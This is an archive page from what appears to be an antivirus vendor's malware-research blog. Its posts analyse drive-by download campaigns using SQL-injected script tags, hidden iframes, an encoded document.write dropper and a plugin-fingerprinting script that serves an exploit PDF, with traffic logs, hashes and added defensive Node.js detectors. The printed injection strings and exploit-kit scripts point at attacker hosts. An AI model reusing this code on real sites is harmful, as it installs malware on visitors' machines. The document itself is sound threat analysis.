Archive for the 'IFRAME' Category

11
Jun

Robint.us SQLi Utilizing CVE-2010-1297 Exploit

The crew behind the recent massive SQLi is currently exploiting the latest CVE-2010-1297 vulnerability in its drive-by-download attacks. Yesterday, I created a video demonstrating how Cloud Antivirus blocked the 0day exploit using the new behavioral blocking technology included in the free version. Check that out here:

We recommend patching Adobe and then installing Cloud Antivirus to prevent any future 0day attacks.

Here are some logs of our most recent encounter:

Session traffic:

GET hxxp://2677.in/cnzz.html

200 OK (text/html)

GET hxxp://2677.in/ie.html

200 OK (text/html)

GET hxxp://s11.cnzz.com/stat.php?id=1990191&web_id=1990191

200 OK (text/html)

GET hxxp://2677.in/log.txt

200 OK (text/plain)

GET hxxp://2677.in/anhey.swf

200 OK (application/x-shockwave-flash)

GET hxxp://2677.in/anhey.swf

206 Partial Content (application/x-shockwave-flash)

GET hxxp://zs13.cnzz.com/stat.htm?id=1990191&r=http%3A//www.generationdb.com/&lg=en-us&ntime=0.14859300%201276289711&repeatip=0&rtime=0&cnzz_eid=82761217-1276289711-http%3A//www.generationdb.com/&showp=800x600&st=1276292642&sin=http%3A//www.generationdb.com/&res=0

200 OK (image/gif)

GET hxxp://2677.in/log.exe

200 OK (application/octet-stream)

Injection log:

<table width="96%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2"><img alt="" src="images/5x5.gif" width="5" height="8" /></td>
</tr>
<tr>
<td align="center" class="hoverbox"><a href="#"><img src='upload/community/moresmall_37726110_lego.jpg<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" /><img src='upload/community/large_37726110_lego.jpg<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" class="preview" /></a></td>
<td width="55%" valign="top" class="category">
<a href="unregisteredcommunity.aspx?Com_id='7'" target="_self">We are all</a> ... <br />Category: Groups,<br />Location: USA<script src=hxxp://2677.in/yahoo.js></script></td></tr><tr><td colspan="2">-----------------------------------------</td></tr></table></td>
</tr><tr>
<td>
<table width="96%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2"><img alt="" src="images/5x5.gif" width="5" height="8" /></td>
</tr>
<tr>
<td align="center" class="hoverbox"><a href="#"><img src='upload/community/moresmall_2065474113_IMG_4127.JPG<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" /><img src='upload/community/large_2065474113_IMG_4127.JPG<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" class="preview" /></a></td>
<td width="55%" valign="top" class="category">
<a href="unregisteredcommunity.aspx?Com_id='6'" target="_self">Technosoft</a> ... <br />Category: Business,<br />Location: India<script src=hxxp://2677.in/yahoo.js></script></td></tr><tr><td colspan="2" class="line">-----------------------------------------</td></tr></table></td>
</tr>
</table>
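The injected strings above all follow one pattern: a `<script src=...></script>` pair appended to a database field (here an image path) that the site later renders inside an attribute value. As an added example, not code from the original post, the following Node.js script scans server-rendered HTML for that pattern, tells apart script tags that landed inside another tag's attribute from ones injected into text, and lists the external hosts they load from. The sample HTML is constructed from the injection log above with the URLs kept defanged (hxxp); nothing is fetched.

```javascript
// Added example (not from the original post): locate <script src=...></script>
// pairs that were injected into stored content, as in the injection log above.
// Constructed sample, trimmed from that log; URLs kept defanged (hxxp).
const SAMPLE_HTML = `
<td align="center" class="hoverbox"><a href="#">
<img src='upload/community/moresmall_37726110_lego.jpg<script src=hxxp://ww.robint.us/u.js></script><script src=hxxp://2677.in/yahoo.js></script>' alt="" />
</a></td>
<td width="55%" valign="top" class="category">
<a href="unregisteredcommunity.aspx?Com_id='7'" target="_self">We are all</a> ... <br />
Category: Groups,<br />Location: USA<script src=hxxp://2677.in/yahoo.js></script></td>
`;

// Matches a script element with a src attribute and an empty body, which is
// what a blind "append this to every text column" SQLi leaves behind.
const SCRIPT_RE = /<script\s+src=["']?([^"'\s>]+)["']?\s*>\s*<\/script\s*>/gi;

// Hostname of the injected src. The hxxp:// defang is undone only so that the
// URL parser accepts it; the result is a string, nothing is requested.
function hostOf(src) {
  try {
    return new URL(src.replace(/^hxxp/i, 'http')).host;
  } catch (e) {
    return src;
  }
}

function findInjectedScripts(html) {
  const hits = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    // Strip earlier injected scripts before looking back, so a second injected
    // tag directly after the first is still judged by the surrounding markup.
    const before = html.slice(0, m.index).replace(SCRIPT_RE, '');
    // An unclosed '<' before the match means we are inside a tag, i.e. the
    // script text is part of an attribute value that came out of the database.
    const insideTag = before.lastIndexOf('<') > before.lastIndexOf('>');
    hits.push({
      offset: m.index,
      src: m[1],
      host: hostOf(m[1]),
      context: insideTag ? 'attribute' : 'text',
    });
  }
  return hits;
}

function summarize(html) {
  const hits = findInjectedScripts(html);
  return {
    total: hits.length,
    inAttribute: hits.filter(h => h.context === 'attribute').length,
    hosts: [...new Set(hits.map(h => h.host))].sort(),
  };
}

console.log(JSON.stringify(summarize(SAMPLE_HTML), null, 2));
```

Run over the sample, `summarize` reports three injected scripts, two of them inside attribute values, loading from `2677.in` and `ww.robint.us`. The same function can be pointed at a dump of the affected text columns rather than rendered pages, which is where the cleanup has to happen.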

13
Oct

Internet Exploitation Adventure

This post shows the lengths people will go to in order to install malware onto computers. We will show how visiting one website takes you on a journey through many websites that check your computer for vulnerable software and, if they find some, install malware on it.

First, there is a list of the domains involved in the exploit adventure. Simply visiting hxxp://defendmycreditunion.org starts this process. Hidden iframes then load websites that scan your computer for vulnerabilities and, if they cannot exploit it, redirect you somewhere else. These websites are still active, so proceed at your own risk.

The links on this page DO NOT link to the infected website. They are anchor links to sections further down the page, so the analysis is easier to follow. The links just below are listed in the approximate order in which the pages would load while exploiting the machine.

BE ADVISED: The actual domains may still be active. Proceed at your own risk!

The picture below shows a visual map of how the pages are loaded.

Continue reading ‘Internet Exploitation Adventure’

04
Oct

Another Adobe Acrobat Exploit (accwizm.exe)-VIDEO

Once again, we have an Adobe exploit page injecting another piece of malware. This one is different from the one posted earlier: it redirects through multiple pages, logging each visitor. I was able to capture a video of the computer being exploited simply by visiting the page. As with the previous exploit, the binary installed is almost fully undetected except for a few heuristic catches. Look below for more information about this exploit and about the binary. It can be downloaded from /pnuemo-malware/ in our repository.

BE ADVISED: All sites may be active. Proceed at your own risk.

The user will visit the following URL: hxxp://66.232.117.33/~catetc/tdsHAX/kotopoucykanety.php

This page contains a simple hidden iframe that loads multiple pages, each of which logs the visitor.

<iframe src="hxxp://megsrdomain.cn/tor/count.php?o=5" width=1 height=1 style="visibility: hidden"></iframe>

Inside the iframe we are redirected twice before reaching the exploit page.

hxxp://megsrdomain.cn/tor/count.php?o=5 -> hxxp://megsrdomain.cn/tor/count.php?o=2 -> hxxp://82.103.138.10/ls/?t=24

hxxp://82.103.138.10/ls/?t=24 is the page that exploits Adobe Acrobat and installs the malware. This page contains many, many pages of code and there is too much to post here. You can view or download a clean .txt of the page code for this exploit by clicking here.

accwizm.exe
Result: 8/36 (22.22%)
MD5:
2bee943c7b8e63d17a92b99087ba15a7
VirusTotal
Sunbelt Sandbox

Download Video

31
Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

The user visits hxxp://120.50.46.90/~admin/tps/index.php, and the following obfuscated code is included:

<script language="javascript">document.write(unescape('%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E'));</script>

When deobfuscated, it becomes:

<iframe src="hxxp://69.46.27.41/afxv/tpv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
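The deobfuscation step above is mechanical: pull the string literal out of `unescape('...')`, apply the legacy percent-decoding, and read the resulting markup. As an added example, not code from the original post, the following Node.js script does exactly that without ever executing the dropper, then reports where the written iframe points and whether it is hidden. The sample input is the obfuscated script from above, reassembled onto one line; the `hidden` rule (1x1 size or a hiding style) is this example's own assumption.

```javascript
// Added example (not from the original post): decode a document.write(unescape(...))
// dropper without executing it, then inspect the iframe it would have written.
// Constructed sample: the obfuscated script above, reassembled onto one line.
const SAMPLE_SCRIPT =
  '<script language="javascript">document.write(unescape(\'' +
  '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E' +
  '%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69' +
  '%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68' +
  '%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69' +
  '%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74' +
  '%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66' +
  '%72%61%6D%65%3E\'));</script>';

// Re-implements the legacy unescape(): %uXXXX -> one UTF-16 unit, %XX -> one
// code unit, anything else passes through unchanged. No eval involved.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// Tiny attribute parser for a single tag body: handles "..", '..' and bare values.
function parseAttributes(tagBody) {
  const attrs = {};
  for (const a of tagBody.matchAll(/(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g)) {
    attrs[a[1].toLowerCase()] = a[2] !== undefined ? a[2] : (a[3] !== undefined ? a[3] : a[4]);
  }
  return attrs;
}

// Returns null when no unescape('...') literal is present; otherwise the decoded
// markup plus, if it contains an iframe, the iframe target and a "hidden" verdict.
function analyzeDocumentWrite(script) {
  const lit = script.match(/unescape\(\s*(['"])((?:(?!\1).)*)\1\s*\)/);
  if (!lit) return null;
  const decoded = jsUnescape(lit[2]);
  const iframe = decoded.match(/<iframe\b([^>]*)>/i);
  if (!iframe) return { decoded, src: null, hidden: false };
  const attrs = parseAttributes(iframe[1]);
  const style = (attrs.style || '').replace(/\s/g, '').toLowerCase();
  // Assumed rule: a 1x1 frame or a hiding style counts as hidden.
  const tiny = Number(attrs.width) <= 1 && Number(attrs.height) <= 1;
  const hidden = tiny || /visibility:hidden|display:none/.test(style);
  return { decoded, src: attrs.src || null, width: attrs.width, height: attrs.height, hidden };
}

console.log(analyzeDocumentWrite(SAMPLE_SCRIPT));
```

On the sample this yields the same iframe shown above, with `src` set to the 69.46.27.41 page and `hidden` true. Keeping the decode as a pure string operation is the point: the markup is recovered for analysis while the `document.write` never runs.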

We can see the hidden iframe above; the page it loads includes the following code:

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
  // Loose regex for "Adobe Acrobat Plug-in ... <version>"; captures the version string
  re=/.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
  if(res=re.exec(navigator.plugins[i].description))
  {
    ppdf=res[1];
  }
  // Same idea for "Shockwave Flash <major>.<minor> r<build>"
  var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
  var res;
  if(res=re.exec(navigator.plugins[i].description))
  {
    flash=res[1]+'.'+res[2]+'.'+res[3];
  }
}
ppdfenable=0;
if(ppdf!=0)
{
  ppdfenable=0;
  // Strip non-digits, then compare the first two digits: 7.0 and anything below 7 are targeted
  ppdf=ppdf.replace(/\D/g,"");
  if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
  if(ppdf[0]<7)ppdfenable=1;
  if(ppdfenable)
  {
    document.write('<iframe width=1 height=1 src="hxxp://69.46.27.41/afxv/tpv/gnu.pdf"></iframe>');
  }
}
</script>

Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.
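The fingerprint-then-drop script above is recognisable from a handful of textual features: a loop over `navigator.plugins`, a regex run on plugin descriptions, a comparison on version digits, and a `document.write` of a 1x1 iframe whose target is a PDF. As an added example, not code from the original post, the following Node.js script scores a piece of JavaScript on those features and flags it when the score crosses a threshold. The feature list, weights and threshold are this example's own assumptions; the two inputs are constructed: a trimmed copy of the kit script above and a benign plugin check that also touches `navigator.plugins`.

```javascript
// Added example (not from the original post): a heuristic scorer for scripts that
// fingerprint navigator.plugins and then write a tiny iframe to a PDF, the
// pattern shown above. Feature weights and the threshold are assumptions.
const FEATURES = [
  { name: 'walks navigator.plugins',       re: /navigator\.plugins\s*\[/,                        weight: 3 },
  { name: 'regex over plugin description', re: /\.exec\(\s*navigator\.plugins/,                  weight: 2 },
  { name: 'compares version digits',       re: /\[0\]\s*[<>=]=?\s*\d/,                           weight: 2 },
  { name: 'document.write of an iframe',   re: /document\.write\s*\(\s*['"]<iframe/i,            weight: 3 },
  { name: '1x1 iframe',                    re: /<iframe[^>]*width=['"]?1\b[^>]*height=['"]?1\b/i, weight: 2 },
  { name: 'iframe points at a PDF',        re: /<iframe[^>]*src=['"]?[^'">]*\.pdf/i,             weight: 3 },
  { name: 'unescape() payload',            re: /unescape\s*\(/,                                  weight: 1 },
];
const THRESHOLD = 8; // assumed cut-off; tune it against a corpus before relying on it

// Scores one script body; returns the matched feature names alongside the verdict
// so an analyst can see why something was flagged.
function scoreScript(src) {
  const matched = FEATURES.filter(f => f.re.test(src));
  const score = matched.reduce((sum, f) => sum + f.weight, 0);
  return { score, matched: matched.map(f => f.name), suspicious: score >= THRESHOLD };
}

// Constructed sample: the fingerprinting script above, trimmed to the Reader check.
const KIT_SCRIPT = `
ppdf=0;i=0;
for(;navigator.plugins[i];i++){
  re=/.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
  if(res=re.exec(navigator.plugins[i].description)){ppdf=res[1];}
}
ppdfenable=0;
if(ppdf!=0){
  ppdf=ppdf.replace(/\\D/g,"");
  if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
  if(ppdf[0]<7)ppdfenable=1;
  if(ppdfenable){document.write('<iframe width=1 height=1 src="hxxp://69.46.27.41/afxv/tpv/gnu.pdf"></iframe>');}
}`;

// Constructed sample: a benign capability check that also enumerates plugins.
const BENIGN_SCRIPT = `
var hasPdf = false;
for (var i = 0; i < navigator.plugins.length; i++) {
  if (/PDF/.test(navigator.plugins[i].name)) hasPdf = true;
}
document.getElementById('notice').textContent = hasPdf ? 'PDF viewer found' : 'No PDF viewer';
`;

console.log(scoreScript(KIT_SCRIPT));
console.log(scoreScript(BENIGN_SCRIPT));
```

The kit script matches six of the seven features and scores 15; the benign check only matches the plugin enumeration and scores 3. Plugin enumeration on its own is common in legitimate pages, which is why it carries weight but does not reach the threshold alone.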

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

29
Aug

XP Antivirus 2008 IFRAME update

While stepping through malicious domains I noticed that the “International Virus Research Lab” (IVRL) pages for XP Antivirus 2008 had changed hashes. I was looking at hxxp://bestantivirus2009.com at the time and noticed the inclusion of an IFRAME pointing to hxxp://huytegygle.com/index.php.

[Image: the injected IFRAME]

I took a look at the IFRAME and found the following obfuscated javascript.

[Image: obfuscated JavaScript code]

After attempting a few exploits, the code eventually leads us to hxxp://huytegygle.com/bin/file.exe, which has a low (7/36, mostly heuristic) detection rate at VirusTotal. The file has been made available inside /lithium-malware/.

File: file.exe [ThreatExpert]
File size: 8192 bytes
MD5: a2a6455a4da0192fb8efe85e98fd3dfa
SHA1: a9a65198cf692a306be1e23c9e965549b7294b26
SHA256: 92255343407bf219f094bec01ac7750cf82869741d6fb5c27967624ce0e6bc80
SHA512: 2b9a1c7b33e80bdfc213be9d3dfbeb7491ede790045c5aec15ec55bd686c9787d2b19420f8058286c286375db2bee84e55d101c42f99a03a92010691e0b8eeb9
PEiD: -

SANDBOX ANALYSIS PAGE
